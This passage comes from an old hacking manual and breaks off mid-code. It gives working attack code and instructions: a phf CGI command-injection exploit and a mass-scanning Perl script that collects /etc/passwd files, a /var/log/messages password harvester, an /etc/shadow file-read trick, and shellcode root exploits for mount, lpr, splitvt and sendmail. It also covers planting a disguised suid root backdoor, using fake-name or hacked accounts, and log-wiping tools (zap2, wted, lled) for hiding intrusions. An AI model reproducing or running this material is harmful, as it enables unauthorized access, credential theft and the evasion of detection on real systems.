     int i = 0, s, port, bytes = 128;
     char exploit[0xff], buffer[128], hostname[256], *command, j[2];
     struct sockaddr_in sin;
     struct hostent *he;

     if (argc != 3 && argc != 4) {
          fprintf(stderr, "Usage: %s command hostname [port]", argv[0]);
          exit(1);
     }

     command = (char *)malloc(strlen(argv[1]) * 2);

     while (argv[1][i] != '\0') {
          if (argv[1][i] == 32) strcat(command, "%20"); else {
               sprintf(j, "%c", argv[1][i]);
               strcat(command, j);
          }
          ++i;
     }

     strcpy(hostname, argv[2]);
     if (argc == 4) port = atoi(argv[3]); else port = 80;

     if (sin.sin_addr.s_addr = inet_addr(hostname) == -1) {
          he = gethostbyname(hostname);
	  if (he) {
               sin.sin_family = he->h_addrtype;
               memcpy((caddr_t) &sin.sin_addr, he->h_addr_list[0], 
                      he->h_length);
          } else {
               fprintf(stderr, "%s: unknown host %s\n", argv[0], hostname);
               exit(1);
          }
     }
     sin.sin_family = AF_INET;
     sin.sin_port = htons((u_short) port);

     if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
          fprintf(stderr, "%s: could not get socket\n", argv[0]);
          exit(1);
     }

     if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
          close(s);
          fprintf(stderr, "%s: could not establish connection\n", argv[0]);
          exit(1);
     }

     sprintf(exploit, "GET /cgi-bin/phf/?Qalias=X%%0a%s\n", command);
     free(command);
     write(s, exploit, strlen(exploit));
     while(bytes == 128) {
          bytes = read(s, buffer, 128);
          fprintf(stdout, buffer);
     }
     close(s);
}

-------- cut here

Here is how you use it:

bash% phf id xxx.org

------

Query Results

/usr/local/bin/ph -m alias=X id

uid=65534(nobody) gid=65535(nogroup) groups=65535(nogroup)
;
close(FILE);

# Open output file.
open(OUTFILE, ">>GetURLResults") or die("GetURL: Cannot open output file.\n");

my($url)="";
foreach $url (@URLs) {
  print ("Now checking: $url");
  chomp($url);
  $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/usr/bin/id`;
  print OUTFILE ("\n============ $url ============\n");
  foreach (split(/\n/, $result)) {
    print OUTFILE ("$_\n");
  }
  if ($result =~ m/id=/i) {
    if ($result =~ m/root/i) {
      print ("Logging root response.\n");
    } else {
      print ("Got ID response, getting /etc/passwd...");
      $result = `$program http://${url}/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd`;
      
      # Output results to file named .passwd;
      local($domainfilename)="";
      $domainfilename = $url;
      if (open(PASSWDFILE, ">${domainfilename}.passwd")) {
        print PASSWDFILE ("\n");
        foreach (split(/\n/, $result)) {
          print PASSWDFILE ("$_\n");
        }
        close(PASSWDFILE);
        print ("Done! [$domainfilename].\n");
      } else {
        print ("FAILED! [$domainfilename].\n");
      }
    }
  }
}
  
# We are done. Close the output file and end the program.
close (OUTFILE);


0;

------------- cut here

Ok this is easy, if you name your domain file urls, you are all set to go.
Just type geturl.pl after chmod +x on the file.

Here are my doc's for the file:

This handy tool is easy to use and will get you some root access and
many passwd files from different domains.

geturl.pl will try and log results for every domain on the internet.  You
choose the type: .COM .EDU .ORG .MIL .GOV  (OR) you can supply a list of
IP addresses to  be checked.  If  finds a root access account it
will simply log uid=root in the result file and go on to the next domain.
If PHF Probe finds non-root access it will snag the passwd file for you and
save it in the current directory in the (domainname.???.passwd) format.

Here are the short doc's and how it works.  Any questions /msg i-e or i^e

ftp to ftp.rs.internic.net

in the domain directory you will find:

com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz

download these files and run getdomain.pl on the domains you want to target
first, in this manor:  "perl getdomain.pl com.zone com >com.all"

What this will do is rip all of the .COM domains and put them into a file
called com.all.

If you wanted to do all of the .EDU addresses you would type:

perl getdomain.pl edu.zone edu >edu.all

Now you will have a list to use with (geturl.pl) called edu.all

To use this list just type:

geturl.pl 

filename=edu.all or com.all  and leave out the <>'s
if you name your domain file 'urls' it does not require 

results will log into a file name of: GetURLResults in the current directory.

1. geturl.pl will search using lynx (make sure it is in your path)

2. if geturl finds it has root access to httpd on a url it will just log
   root for that domain in the result file.  If geturl finds it is not root,
   but still has access to the domain using phf it will snatch the domain
   passwd file and save it in the current directory under fulldomainname.passwd

3. if you like you can just give a list of ip addresses in the feed file

4. i use os/2 with lynx and perl ported to the hpfs so i have no problems
   with the long file names.  i have tested it under unix and it works good
   so you should have no problems running this in a unix shell.

What you need:

1. Perl in the path
2. Lynx in the path
3. 256 char filenames ie: (unix or os/2 hpfs)
4. The files included here
5. Internic's domain files from their ftp or just make your own list or
   urls or IP's and name the file 'urls' and type: geturl.pl

Caution:

It would be best if you paid cash for an internet account in your area under
another name or used a hacked account to get all of your results, then used
another safe account to start your work on the results.  BUT I don't need to
tell you this right?  I take no blame for these files, they are provided for
you to use to check security on domains ;)


 getdomain.pl: to rip .ORG .COM .EDU .MIL .GOV Internic domain files
    geturl.pl: to check and log the results of each domain
GetURLResults: The file that geturl makes as its log file

Here is one more thought:

If you can read the /var/adm/messages file you can get some user passwords
out of there lotz of times!  I have even got ROOT passwords from there!

Wow many times have you been in a hurry to login?  You type the password
at the Login:  his is easy to do on one of those days that nothing seems to
be going right.  You failed the login twice, the system is running slow, and it
just happens!

Login: you hit enter
Password: you think this is wanting the login name so you type your name
Login: you type your password

In the messages file it looks like this:

Login: yourpassword
Password ****** They don't give it, only the login name, but ooops, you
typed your password, and if we have access to read the messages file,
we have a good password to put in crackerjack and run it.  If on a small
system, no prob ... lets hope it's root ;)

Here is a script to make things easy!


FOR QUANTUM'S BINDWAREZ FILE: You will find it at the end of this paper
in the appendix uuencoded.

------------ cut here

#!/bin/sh
# Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
# /var/log/messages is world readable. If a user types in his password at
# the login prompt, it may get logged to /var/log/messages.
#
# I could swear this topic has been beaten to death, but I still see this
# problem on every linux box I have access to.
#
# Dave G.
# 12/06/96
# 
# http://www.escape.com/~daveg

echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$

grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$

if [ ! -e ./scrack ]
then
   echo "Creating scrack.c"
   cat << ! > scrack.c
#include 
#include 
#include 
#include 
#define get_salt( d, s ) strncpy( d, s, 2 )
void
main(argc,argv)
int argc;
char **argv;
{
   struct passwd *pwd;
   FILE *fp;
   char buff[80], salt[3], *encrypted_string;

   if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
   {
      fprintf( stderr, "Couldnt find dict file\n" );
      exit(1);
   }
   while ( fgets( buff, 80, fp ) != NULL )
   {
      setpwent();
      buff[strlen(buff)-1]='\0';
      while ( ( pwd = getpwent() ) != NULL )
      {
        if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
           ( strlen( (*pwd).pw_passwd ) == 13 ) )
        {
           get_salt(salt, (*pwd).pw_passwd );

           encrypted_string = crypt( buff, salt );
           if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
           {
             fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
             fflush(stdout);
           }
         }
      }
   }
}
!
   echo "Creating scrack"
   cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
fi

./scrack /tmp/messages.dict.$$

echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself.

------ cut here

-----------------------
Section 3B
Newbe's
-----------------------

Yup, again, just another place to get password files.  Just follow the guide
lines in section 2B.  Use your sly ideas and get out there and make some
lame friends ;)

Remember you could have been a lammer before you read this manual rin

-----------------------------
Section 3C
Getting shadow passwd files
-----------------------------

What is a shadow password file?

Lets just use the passwd file above to show you what it would look like to you
if you cat it.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
man:x:13:15:man:/usr/man:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:x:-2:100:nobody:/dev/null:
ftp:x:404:1::/home/ftp:/bin/bash
guest:x:405:100:guest:/dev/null:/dev/null
bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:x:502:100:Web Master:/home/web:/bin/bash
mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash

Something missing?  Yup, the encrypted passwords.  If you get root access the
encrypted passwords are in /etc/shadow.  Some admin's will hide the shadow file
in some weird directory somewhere, but most of the time you will find it right
in /etc.  Other shadow programs might put it in a master.passwd file.  But if
you get root just have a good look around.

Lets say you have an account on the machine and just can't get root access.

Not a problem if they are using libc 5.4.7, at this time most still are ;)
Also one of these files have to have suid perm's (no prob):

ping, traceroute, rlogin, or, ssh

1. Type bash or sh to start a bash shell
2. Type: export RESOLV_HOST_CONF=/etc/shadow
3. Type one of the file names above with asdf, like this:

ping asdf

It should cat the passwd shadow file for you if it works.
I seem to find it working on most of the systems i am going on these days.

Note: you can replace /etc/shadow with any root owned file you want to read.

Here is a quick script you can run on any file you want to make it easy:

rcb.c
-------- cut here

/* RCB Phraser - therapy in '96
 * Limits: Linux only, no binary files.
 * little personal message to the world: FUCK CENSORSHIP!
 */

#include 

void getjunk(const char *filetocat)
{ setenv("RESOLV_HOST_CONF",filetocat,1);
  system("ping xy 1> /dev/null 2> phrasing");
  unsetenv("RESOLV_HOST_CONF");
}

void main(argc,argv)
int argc; char **argv;
{ char buffer[200];
  char *gag;
  FILE *devel;
  
  if((argc==1) || !(strcmp(argv[1],"-h")) || !(strcmp(argv[1],"--help")))
  { printf("RCB Phraser - junked by THERAPY\n\n");
    printf("Usage: %s [NO OPTIONS] [FILE to cat]\n\n",argv[0]);
    exit(1);
  }
  getjunk(argv[1]);
  gag=buffer;
  gag+=10;
  devel=fopen("phrasing","rb");
  while(!feof(devel))
  { fgets(buffer,sizeof(buffer),devel);
    if(strlen(buffer)>24)
    { strcpy(buffer+strlen(buffer)-24,"\n");
      fputs(gag,stdout);
    }
  }
  fclose(devel);
  remove("phrasing");
}

-------------- cut here

command line : rcb /etc/shadow  or any other file on the system you
can't read ;)

--------------------
Section 3D
Getting /etc/hosts
--------------------

Just a precaution, sometimes you will need to know what other systems
are in the hosts file, or what are all of the ip addresses or different domains
on the system.  Make sure to cat the /etc/hosts file for more information
you might need later.

--------------------------
Chapter IV
Getting the root account
--------------------------
Like I said before all you need is one account in most cases, if you cannot get
root on the system you might want to trade it off to some irc junkie that
just wants to load a bot, for some other account or info that can help you in
your hacking quest.  There will be enough information here so that if you can't
get root access, their system is well kept and probably will be kept up in the
future.  You can always lay the account on the side, put the info in some kind
of log file with some good notes so that you can come back at a later time,
like right when a new exploit comes out ;)

Try to stay out of the system until that time so that you do not risk loosing
the account.  Remember that when you login to an account and can't get root
you will not be able to clean the logs, and the next time the user logs in he
might see a message that says: last login from xxx.com time:0:00 date:xx/xx/xx

------------
Section 4A
Bugs
------------

There are many bugs out there in different programs that you can use to get
root.  It might be a game installed on the system, or even the sendmail
program.  If they do not update their programs on a regular basis, you can
be sure you will be able to get in now, and if not, soon to come.

I will be sure to provide the main exploits and bugs here and other less
used below in the appendix section.  I will make sure here to give you detailed
english terms so that you can exploit root on the system.  But please be sure
to read the sections below, and this manual entirely before proceeding, to be
sure you get started in the right way and not blow you chances of having a
long stay on the system.

------------
Section 4B
Exploits
------------

umount/mount exploit

Look in the /bin directory for a file called umount (or mount),
if you do not find it there do a search for the file like this:

find / -name umount -print -xdev

(you can look for any other file name the same way)

Go to the directory where the file is and do: ls -al um*

If the file has suid perm's you can probably get root.

SUID perm's has the rws for the owner of the file which is root.  What you are
looking for is the (s)

Look here:

victim:/bin# ls -al um*
-rwsr-sr-x   1 root         8888 Mar 21  1995 umount
victim:/bin#

This machine we can get root by a compile on the file below:

umount.c
------ cut here

/* sno.c : Linux realpath exploit
 * Syntax: ./sno N
 *         mount $WOOT 
 *    OR  umount $WOOT
 * N is some number which seems to differ between 4 & 8, if your number is
 * too big, you will get a mount error, if it is too small, it will seg
 * fault.  Figure it out.  (Sometimes N=0 for mount)
 * If you use mount, first thing to do once you get the root shell is rm 
 * /etc/mtab~, if this file exists you can't root with mount until it is 
 * removed.
 * 
 *
 *                                          -ReDragon
 */
#define SIZE 1024

   long get_esp(void)
   {
   __asm__("movl %esp,%eax\n");
   }

   main(int argc, char **argv)
   {
   char env[SIZE+4+1]; /* 1024 buffer + 4 byte return address + null byte */
   int a,r;
   char *ptr;
   long *addr_ptr;
   char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
   char *exec_ptr = execshell;

   r=atoi(argv[1]);  
   ptr = env;
   memcpy(ptr,"WOOT=",5); /* set environment variable to use */
   ptr += 5;              

   for(a=0;a
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
                        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
                        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                        "\xd7\xff\xff\xff/bin/sh";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
---------- cut here

***************************
Here is the BSD version
***************************

lpr.bsd.c
--------------------------------------------------------- cut here
#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] =
   "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
   "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
   "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
   "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------- cut here

Now just compile it and chmod it +x, and run it.

Watch this one on the group file owner.  Any file you copy will have
group owner as lp, make sure you chgrp root filename on any file you
write.  Always be watching the user groups with ls -l and if you changed
any change them back like this:

chgrp groupname filename

It is a good idea to use this exploit ONLY to get the root access, then
just copy bash or sh to another file name on the system somewhere and make
it root root, suid:  Group owner and File owner root, then chmod it +s

This will give you root access in the future as gid and uid root, without using
the lp group.  Make sure you name it something that looks like it should be
running as a root process somewhere ;)

*****************
Here is another that is still around after a while, look for SUID perm's
on a file /usr/bin/splitvt

If it has suid perm's use this file below, but be sure to read the directions
after the exploit:
****************************************
sp.c
-------------------------------------------- cut here
/*
 *            Avalon Security Research
 *			    Release 1.3
 *			     (splitvt)
 *
 * Affected Program: splitvt(1)
 *
 * Affected Operating Systems: Linux 2-3.X
 *
 * Exploitation Result: Local users can obtain superuser privileges.
 *
 * Bug Synopsis: A stack overflow exists via user defined unbounds checked
 * user supplied data sent to a sprintf(). 
 *
 * Syntax: 
 * crimson~$ cc -o sp sp.c
 * crimson~$ sp
 * bash$ sp
 * bash$ splitvt
 * bash# whoami
 * root
 *
 * Credit: Full credit for this bug (both the research and the code)
 * goes to Dave G. & Vic M.  Any questions should be directed to
 * mcpheea@cadvision.com . 
 *
 * ----------------------------------------------------------------------------
 */


long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
  char eggplant[2048];
  int a;
  char *egg;
  long *egg2;
  char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  char *eggie = realegg;

  egg = eggplant;

  *(egg++) = 'H';
  *(egg++) = 'O';
  *(egg++) = 'M';
  *(egg++) = 'E';
  *(egg++) = '=';

  egg2 = (long *)egg;

  for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;

  egg=(char *)egg2;

  for (a=0;a<0x40;a++) *(egg++) = 0x90;

  while (*eggie)
    *(egg++) = *(eggie++);
  *egg = 0; /* terminate eggplant! */

  putenv(eggplant);

  system("/bin/bash");
}

-------------- cut here

Ok this is how splitvt works:

1. Compile the file
2. Run the sp file
3. Run splitvt

Before you run the file:   whoami {press enter}
                           username
After you run the exploit: whoami
                           root

*******************************************************

Now if all of these have not got you root, try sm.sh.  This is a sendmail
bug that works with 8.73 to 8.83 (maybe some others)

Here is the script:

sm.sh
---------- cut here
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c

cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
cd /tmp
sh
------------ cut here

Just chmod the file +x like this

chmod +x sm.sh

1. Run the file
2. It will take you to the /tmp directory
3. type ls -l and see if you have a SUID sh file there, if you do, type
   whoami, if not root, run the file ./sh, now see if you are root ;)

I will add many more scripts in the appendix, but these should be the best
at this time to get root access on linux or BSD, if you need another BSD
exploit try the crontab exploit for BSD in the appendix.
****************************************************************************

--------------------------
Chapter V
Making yourself invisible
--------------------------

The whole point of this hacking stuff is that you continue to have access to as
many points of information as possible.  If you do stupid things, of fail just
once to clean your utmp or wtmp, xferlog's, etc ... you can loose access to the
system.  Make yourself a regular order to follow and learn each system well!

Become part of the system, and take many notes if you are doing many systems
at once.  But remember make yourself a routine.  Have your set routine of
taking your time to clean any presence of your login, transfers, etc.  Do NOT fail
in this one thing or you will loose access and possibly face some sort of
charges.

----------------------------
Section 5A
Zap2 (for wtmp/lastlog/utmp)
----------------------------

There are different log cleaning programs out there, but the best of these
is zap2.  I compile mine to be named z2.

z2 will be run right after you get root access.  This will want to be one of
the fastest things you run.  (you never know)

You might want to do a finger @host.xxx to see who is on now, look at the idle
time of root or admin accounts to see if they are away doing something.

Login, and as soon as you get on, type w, to see idle time and who is on, but
at the same time you are looking at that be typing your root access command
that you should have waiting somewhere nested in the system.  As soon as you
get your root access, type ./z2 username-u-logged-in-as

Now you are safer then you were.  Do a w or who command to see that you are
gone from the utmp.  If you ftp, or do other things you might have to use
other programs I will include in the next section called wted and lled.

Lets finish with this z2 first.  You will have to see where each file is in
the system and edit z2.c to include the right location of these files

Here is the area you will look for right at the top of the file:

#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

Most of the systems I login to are:

#define WTMP_NAME "/var/adm/wtmp"
#define UTMP_NAME "/var/adm/utmp"
#define LASTLOG_NAME "/var/adm/lastlog"


But you do your own look around to see were the files are.  Also /var/log:
is a regular location.

Add the log locations for each system, compile the file, and you are all ready
to be invisible right after the login using z2

Here is the .c file

z2.c
--------------------------- cut here
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
 
int f;
 
void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;
 
  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}
 
void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;
 
    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
 
     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}
 
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;
 
     if ((pwd=getpwnam(who))!=NULL) {
 
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
 
    } else printf("%s: ?\n",who);
}
 
main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}
--------------------------- cut here

---------------
Section 5B
Other scripts
---------------

Now we come to the other part of this.  Lets say that after you login, and do
your z2, you need to ftp in to grab a file. (remember NEVER ftp or telnet out)
Ok, you ftp in and grab a few files, or login to another account on the system,
now you will need to use wted.  wted will let you edit the wtmp to remove your
login from the ftp.  You also might need to use the lled (lastlog edit).

Here is the menu if you type ./wted, after setting log locations & compile:

[8:25pm][/home/compile]wted
Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
            -h      This help
            -f      Use FILE instead of default
            -a      Show all entries found
            -u      Show all entries for USER
            -b      Show NULL entries
            -e      Erase USER completely
            -c      Erase all connections containing HOST
            -z      Show ZAP'd entries
            -x      Attempt to remove ZAP'd entries completely

So if i ftp to username tsmith I would type wted -x -e tsmith

The program will now prompt you one login at a time for the user tsmith asking
if you want to delete it.  After you delete your login, make sure to
chmod 644 the wtmp.tmp file and then copy it over the top of the wtmp file in
the log directory.  Like this:

1. chmod 644 wtmp.tmp
2. cp wtmp.tmp /var/adm/wtmp

Here is your wted program:

MAKE SURE TO HAVE THE RIGHT PATH TO THE char file below
So make sure you have the right path to the wtmp file.

wted.c
---------------------- cut here
#include 
#include 
#include 
#include 

char *file="/var/adm/wtmp";

main(argc,argv)
int argc;
char *argv[];
{
int i;
if (argc==1) usage();
for(i=1;iut_name)) || (name=="*") ||
		(!(strcmp("Z4p",name)) && (ptr->ut_time==0)))
			printinfo(ptr);
		}
	close(fp);
	}
}

printinfo(ptr)
struct utmp *ptr;
{
char tmpstr[256];
printf("%s\t",ptr->ut_name);
printf("%s\t",ptr->ut_line);
strcpy(tmpstr,ctime(&(ptr->ut_time)));
tmpstr[strlen(tmpstr)-1]='\0';
printf("%s\t",tmpstr);
printf("%s\n",ptr->ut_host);
}

erase(name,host)
char *name,*host;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct utmp utmp;
unsigned char c;
if (fp=open(file,O_RDONLY)) {
        fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
        while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
		if (host)
			if (strstr(utmp.ut_host,host)) tot++;
			else {cnt++;write(fd,&utmp,sizeof(struct utmp));}
		if (name) {
                if (strcmp(utmp.ut_name,name)) {cnt++;
			write(fd,&utmp,sizeof(struct utmp));}
		else { 
			if (n>0) {
				n--;cnt++;
				write(fd,&utmp,sizeof(struct utmp));}
			else
			{
			printinfo(&utmp);
			printf("Erase entry (y/n/f(astforward))? ");
			c='a';
			while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
			if (c=='f') {
				cnt++;
				write(fd,&utmp,sizeof(struct utmp));
				printf("Fast forward how many entries? ");
				scanf("%d",&n);}
			if (c=='n') {
				cnt++;
				write(fd,&utmp,sizeof(struct utmp));
				}
			if (c=='y') tot++;
			} 
		      }	}					
        }
        close(fp);
        close(fd);
        }
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
}

remnull(name)
char *name;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct utmp utmp;
if (fp=open(file,O_RDONLY)) {
        fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
        while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
		if (utmp.ut_time) {
			cnt++;
			write(fd,&utmp,sizeof(struct utmp));
		}
		else
			tot++;
	}
        close(fp);
        close(fd);
        }
printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
}

usage()
{
printf("Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
printf("\t-h\tThis help\n");
printf("\t-f\tUse FILE instead of default\n");
printf("\t-a\tShow all entries found\n");
printf("\t-u\tShow all entries for USER\n");
printf("\t-b\tShow NULL entries\n"); 
printf("\t-e\tErase USER completely\n");
printf("\t-c\tErase all connections containing HOST\n");
printf("\t-z\tShow ZAP'd entries\n");
printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
}
---------------------- cut here

You might also have to clean stuff out of the file /vat/adm/lastlog

For this use the lled.c.  Compile the program and name it lled.

Here is a menu from the program when you type ./lled

[4:04am][/home/paris/compile]lled
Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
-h      This help
-f      Use FILE instead of default
-a      Show all entries found
-u      Show all entries for USER
-b      Show NULL entries
-e      Erase USER completely
-c      Erase all connections containing HOST
-z      Show ZAP'd entries
-x      Attempt to remove ZAP'd entries completely

It would be good to try to view first using -u, but many times it will not
show your username in the lastlog, but it will still have your host, so I
have found that if you know what to look for you can just type something like:
If my host name that I was coming from was machine.edit.com, I could type

lled -e username -c machine.edit

If you need to view the lastlog your host entry should be at the end of the
file, just type: lled -a

chmod the file lastlog.tmp 644 and copy the file over the top of the lastlog
file in the log directory just like you did above for the wted.

BE SURE TO SET THE PATH FOR YOUR lastlog below!

Ok here is your lled.c
-------------------------- cut here
#include 
#include 
#include 
#include 

char *file="/var/adm/lastlog";

main(argc,argv)
int argc;
char *argv[];
{
int i;
if (argc==1) usage();
for(i=1;ill_line)) || (name=="*") ||
		(!(strcmp("Z4p",name)) && (ptr->ll_time==0)))
			printinfo(ptr);
		}
	close(fp);
	}
}

printinfo(ptr)
struct lastlog *ptr;
{
char tmpstr[256];
printf("%s\t",ptr->ll_line);
strcpy(tmpstr,ctime(&(ptr->ll_time)));
tmpstr[strlen(tmpstr)-1]='\0';
printf("%s\t",tmpstr);
printf("%s\n",ptr->ll_host);
}

erase(name,host)
char *name,*host;
{
int fp=-1,fd=-1,tot=0,cnt=0,n=0;
struct lastlog utmp;
unsigned char c;
if (fp=open(file,O_RDONLY)) {
        fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
        while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
                if (host)
                        if (strstr(utmp.ll_host,host)) tot++;
                        else {cnt++;write(fd,&utmp,sizeof(struct lastlog));}
                if (name) {
		if (strcmp(utmp.ll_line,name)) {cnt++;
			write(fd,&utmp,sizeof(struct lastlog));}
		else { 
			if (n>0) {
				n--;cnt++;
				write(fd,&utmp,sizeof(struct lastlog));}
			else
			{
			printinfo(&utmp);
			printf("Erase entry (y/n/f(astforward))? ");
			c='a';
			while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
			if (c=='f') {
				cnt++;
				write(fd,&utmp,sizeof(struct lastlog));
